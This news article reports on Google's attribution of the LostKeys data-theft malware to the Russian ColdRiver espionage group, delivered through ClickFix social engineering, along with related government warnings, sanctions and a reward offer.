Google Links New LostKeys Data Theft Malware to Russian Cyberspies
In a recent development, Google's Threat Intelligence Group (GTIG) has linked a new data theft malware, known as LostKeys, to the Russian state-backed ColdRiver hacking group. Since the start of the year, ColdRiver has been using LostKeys in espionage attacks targeting Western governments, journalists, think tanks, and non-governmental organizations.
According to GTIG, the first observation of LostKeys was in January, as part of ClickFix social engineering attacks. In these attacks, threat actors trick targets into running malicious PowerShell scripts, which downloads and executes additional payloads on the victims' devices, ending with the LostKeys data theft malware.
"LOSTKEYS is capable of stealing files from a hard-coded list of extensions and directories, along with sending system information and running processes to the attacker," GTIG said. "The typical behavior of COLDRIVER is to steal credentials and then use them to steal emails and contacts from the target, but as we have previously documented they will also deploy malware called SPICA to select targets if they want to access documents on the target system. LOSTKEYS is designed to achieve a similar goal and is only deployed in highly selective cases."
ColdRiver is not the only state-backed threat group involved in these attacks, with other groups such as Kimsuky (North Korea), MuddyWater (Iran), APT28, and UNK_RemoteRogue (Russia) also using similar tactics. These groups have been targeting their targets' devices through social engineering and open-source intelligence skills since at least 2017.
Five Eyes cyber agencies also warned in December 2023 of ColdRiver's spear-phishing attacks against defense, governmental organizations, NGOs, and politicians, months after Russia invaded Ukraine. These attacks expanded to target defense-industrial targets and U.S. Department of Energy facilities.
In 2022, the Microsoft Threat Intelligence Center (MSTIC) disrupted another ColdRiver social engineering operation where the attackers used Microsoft accounts to harvest emails and monitor the activity of organizations and high-profile individuals in NATO countries.
The U.S. State Department sanctioned two ColdRiver operators in December 2023, one of whom was an FSB officer, who were also indicted by the U.S. Justice Department for their involvement in a global hacking campaign coordinated by the Russian government. The State Department now offers up to $10 million in rewards for tips that could help law enforcement locate or identify other ColdRiver members.
This latest development highlights the evolving nature of cyber threats and the importance of staying vigilant against state-backed actors. As the threat landscape continues to shift, it is essential for organizations and individuals to stay informed and take proactive measures to protect themselves from these types of attacks.